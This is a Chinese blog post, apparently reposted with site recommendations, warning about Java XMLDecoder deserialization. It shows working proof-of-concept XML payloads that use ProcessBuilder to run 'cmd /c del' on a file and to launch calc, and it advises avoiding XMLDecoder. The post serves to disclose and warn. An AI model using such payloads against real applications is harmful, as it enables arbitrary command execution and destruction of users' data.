jdk紧急漏洞,XMLDecoder反序列化攻击

最新推荐文章于 2024-01-19 11:43:43 发布
最新推荐文章于 2024-01-19 11:43:43 发布
阅读量257 收藏
点赞数
文章标签: java 面试 大数据
原文链接:https://yq.aliyun.com/articles/619323
版权
img_c96a75e659370310a84819010c4e7271.jpe

昨天在公司发现了一个jdk中的XMLDecoder反序列化的漏洞,看起来很危险!下面通过两个示例来看看这个漏洞的危害!

示例1:利用XmlDecoder删除本地文件

首先来看这个xmldecoder.xml文件内容:

<?xml version="1.0" encoding="UTF-8"?>
<java version="1.8.0_151" class="java.beans.XMLDecoder">
    <object class="java.lang.ProcessBuilder">
        <array class="java.lang.String" length="4">
            <void index="0">
                <string>cmd</string>
            </void>
            <void index="1">
                <string>/c</string>
            </void>
            <void index="2">
                <string>del</string>
            </void>
            <void index="3">
                <string>e:\1.txt</string>
            </void>         
        </array>
        <void method="start" />
    </object>
</java>

再来看利用XMLDecoder解析这个xml文件的示例代码:

private static void byXmlFile() {
    File file = new File("E:\\xmldecoder.xml");
    XMLDecoder xd = null;
    try {
        xd = new XMLDecoder(new BufferedInputStream(new FileInputStream(file)));
    } catch (Exception e) {
        e.printStackTrace();
    }
    Object s2 = xd.readObject();
    xd.close();
}

这段代码执行后,直接删除了本地的e:\1.txt文件,相当于在命令行调用了cmd /c del e:\1.txt命令,直接删除了本地文件,相当恐怖!

示例2:利用XmlDecoder调用本地程序
private static void byXmlString() {
    String xml = new StringBuilder().append("<?xml version=\"1.0\" encoding=\"UTF-8\"?>")
            .append("<java version=\"1.8.0_151\" class=\"java.beans.XMLDecoder\">")
            .append("    <object class=\"java.lang.ProcessBuilder\">")
            .append("        <array class=\"java.lang.String\" length=\"1\">")
            .append("            <void index=\"0\">")
            .append("                <string>calc</string>")
            .append("            </void>")
            .append("        </array>")
            .append("        <void method=\"start\" />")
            .append("    </object>")
            .append("</java>").toString();
    XMLDecoder xd = null;
    try {
        xd = new XMLDecoder(new ByteArrayInputStream(xml.getBytes()));
    } catch (Exception e) {
        e.printStackTrace();
    }
    Object s2 = xd.readObject();
    xd.close();
}

这段代码改成了用String输入源的形式,这不重要,重要的是还是利用了jdk中的XmlDecoder类来解析xml字符串。这段代码执行后,会调用出本地的计算器程序。

img_2e0844a69b7f2ffc23af1f8256d5272a.jpe

其中ProcessBuilder.start()的方法和Runtime.exec()方法一样,都可以被用来创建一个操作系统进程,可用来控制进程状态并获得相关信息。

ProcessBuilder的构造方法接受一个命令列表。

public ProcessBuilder(List<String> command) {
    if (command == null)
        throw new NullPointerException();
    this.command = command;
}
总结

Jdk中的XmlDecoder反序列化存在安全漏洞,能调用本地的应用,也能执行系统支持的命令,一旦黑客组织成命令列表攻击系统,后果不堪设想!

我只是用ProcessBuilder类演示了调用系统程序这两种案例,当然还有其他,远不止这一种攻击手段。作者看了下,这个漏洞在jdk8_0_151版本中还存在。

建议不要用JDK中的XmlDeocder类,寻求其它更安全的xml解析工具类。

求转发,紧急扩散,避免更大程度的损失!~

推荐阅读

个人珍藏最全Spring Boot全套视频教程

分享一套高级视频教程:Dubbo+Zookeeper+ActiveMQ+Redis系列

分享一套分布式架构设计高级视频教程

分享一套Hadoop全套视频教程系列

去BAT面试完的Mysql面试题总结(55道,带完整答案)

阿里高级Java面试题(首发,70道,带详细答案)

2017派卧底去阿里、京东、美团、滴滴带回来的面试题及答案

Spring面试题(70道,史上最全)

通往大神之路,百度Java面试题前200页。

分享Java干货,高并发编程,热门技术教程,微服务及分布式技术,架构设计,区块链技术,人工智能,大数据,Java面试题,以及前沿热门资讯等。


weixin_34244102
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2017-10271(JAVA XMLDecoder反序列化专用工具).zip
06-22
测试专用
Weblogic XMLDecoder(CVE-2017-10271)反序列化漏洞复现
weixin_60329395的博客
07-27 501
Weblogic的WLSSecurity组件对外提供服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。通过发送构造的xml数据能通过反弹shell拿到权限
[Java安全]XMLDecoder反序列化学习(一)
feng的博客
09-07 890
前言 上周五看了GKCTF的babycat那题,接触了XMLDecoder的漏洞,看了几天还是没看太明白。。。太菜了呜呜。。所以这是第一篇,暂时分析到这里,前面的处理XML的流程没看明白,光写篇文章理一下后面的部分。等以后再来填坑了。 只是简单的记录自己的调试过程,非常失败,没搞太懂。 利用 利用就是,写一个这样的xml: <java> <object class="java.lang.ProcessBuilder"> <array class="jav
Javaweb安全——反序列化漏洞-原生利用链JDK8u20
weixin_43610673的博客
10-24 1519
回顾一下JDK7u21那个链子,主体部分是通过方法去调用。equalsImpl会将this.type 类中的所有方法遍历并执行,通过设置Templates类,则势必会调用到其中的 getOutputProperties()方法,进而触发任意代码执行。从7u25修复了这个利用链,AnnotationInvocationHandler 的反序列化逻辑发生了改变,将会判断this.type字段值是否是 Annotation 注解类型,不是则直接抛出异常。
Java XML漏洞解决方案
我要MEANING
07-23 2462
1:SAXReader添加 SAXReader saxReader = new SAXReader(false); saxReader.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); saxReader.setFeature("http://xml.org/sax/features/external...
130-剖析xmlDecoder反序列化.pdf
09-20
xmlDecoder反序列化是一种常见的安全漏洞,它允许攻击者通过构造恶意的XML输入来执行任意代码。在本文中,作者深入分析了JavaxmlDecoder反序列化机制,以帮助读者理解这个过程,并提供了一些代码审计的技巧。 ...
JDK反序列化时修改类的全限定性名解析
08-28
JDK提供了内置的序列化支持,但有时在特定场景下,如文中提到的SpringSecurityOAuth2的实现,可能会遇到反序列化时因类全限定性名不同而导致的问题。本文将深入探讨这个问题及其解决方案。 首先,让我们理解一下...
java反序列化工具
11-21
攻击者可以构造恶意的序列化对象,当它被目标应用反序列化时,可能会触发任意代码执行、权限提升或其他安全漏洞。这些漏洞通常利用了类库中的特性和设计缺陷,例如默认的信任所有反序列化数据,或者没有充分验证输入...
JAVA序列化和反序列化的底层实现原理解析
08-25
1、JDK类库中序列化和反序列化API java.io.ObjectOutputStream:表示对象输出流;它的writeObject(Object obj)方法可以对参数指定的obj对象进行序列化,把得到的字节序列写到一个目标输出流中。 java.io....
Java对象的序列化和反序列化实践
12-22
 把字节序列恢复为Java对象的过程称为对象的反序列化。  对象的序列化主要有两种用途:  1)把对象的字节序列地保存到硬盘上,通常存放在一个文件中;  2)在网络上传送对象的字节序列。  一、JDK类库...
jdk1.8 handshake_failure漏洞修复jar UnlimitedJCEPolicyJDK7.zip
08-05
UnlimitedJCEPolicyJDK7 修复jdk1.8的漏洞
java 1.8.0 安全_RedHat安全更新修复OpenJDK1.8.0版本漏洞
weixin_32017501的博客
03-04 1363
综述RedHat发布安全补丁通告,修复了多个java-1.8.0-openjdk的安全问题。相关链接:https://access.redhat.com/errata/RHSA-2018:0095漏洞概述在OpenJDK的Hotspot和AWT组件中发现了多个缺陷。不可信的Java应用程序或小程序可以使用这些漏洞绕过某些Java沙箱限制。(CVE-2018-2582,CVE-2018-2641)...
JDK序列化与反序列化
lovely960823的博客
11-01 610
jdk序列化与反序列化
一次项目漏洞升级的过程(JDK8升级到JDK17)
最新发布
熊浪的博客
01-19 776
1、spring-web需要升级到6.x,spring-boot需要升级到3.x,JDK需要升级到JDK17(Oracle JDK17三年免费授权从2024年9月,所以需要使用OpenJDK17),Java EE转Jakarta;因为使用了OpenJdk17,cglib代理在2019年8月停止更新,OpenJDK17是2019年9月出来的,也不支持需要修改;第二步、扫描后的漏洞存在镜像漏洞,中间件漏洞和代码jar包漏洞;第三步、区分对外和不对外的服务,先更新对外服务;第二步、更新IDEA的JDK配置。
javaXMLEncoder与XMLDecoder及xStream工具使用
java编程学习_java基础教程_booyzhang的博客
05-17 1434
根据对象生成XML文档. 使用Java提供的java.beans.XMLEncoder和java.beans.XMLDecoder类。 这是JDK 1.4以后才出现的类 步骤: (1)实例化XML编码器 XMLEncoder xmlEncoder = new XML Encoder(new BufferedOutputStream(new FileOutputStream(new File(“a.xm)”))); (2)输出对象 (3)关闭 代码示例: package com.booy; import c
XML漏洞分析
F1or_的博客
08-19 729
可以看见这里的函数其实是已经获得了calc,即我们传入的字符了,但是最后却没有返回,返回的是一个带有calc的ValueObjectImpl,而且你可以发现,现在的getValObject是在StringElementHandler的里面,对应前面一开始传入的hashmap对应值,也就是说在这里他截取了。看一下之前的xml文件,这一部分之前说过,当property不为空就可以进入循环,就是在下图这个位置,然后invoke,直接调用方法了,这里是先进行赋值。里面有个invoke,成功执行了。
漏洞分析】jdk9+Spring 及其衍生框架
m0_70565884的博客
05-23 306
一. 漏洞利用条件 jdk9+ Spring 及其衍生框架 使用 tomcat 部署 spring 项目 使用了 POJO 参数绑定 Spring Framework 5.3.X < 5.3.18 、2.X < 5.2.20 或者其他版本 二. 漏洞分析 通过 API Introspector. getBeanInfo 可以获取到 POJO 的基类 Object.class 的属性 class,进一步可以获取到 Class.class 的其他属性,其中就包括了 classloa
JavaXMLDecoder反序列化漏洞
Mi1k7ea
12-17 5271
基本概念 XMLDecoder用于将XMLEncoder创建的xml文档内容反序列化为一个Java对象,其位于java.beans包下。   影响版本 XMLDecoder在JDK 1.4~JDK 11中都存在反序列化漏洞安全风险。   Demo import com.sun.beans.decoder.DocumentHandler; import org.xml.sax.hel...
XMLDecoder解析流程分析
fnmsd的博客
05-06 9410
前言 经过了Weblogic的几个XMLDecoder相关的CVE(CVE-2017-3506、CVE-2017-10352、CVE-2019-2725),好好看了一下XMLDecoder的分析流程。 本文以jdk7版本的XMLDecoder进行分析,jdk6的XMLDecoder流程都写在了一个类里面(com.sun.beans.ObjectHandler) 此处只分析XMLDecoder的解析...
Java对象序列化与反序列化详解
"Java对象的序列化与反序列化技术详解" Java对象的序列化与反序列化Java编程中的一项重要技术,它允许我们将Java对象转换为字节流,以便于存储或在网络中传输。这章内容主要涵盖以下几个方面: 1. **对象序列化...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值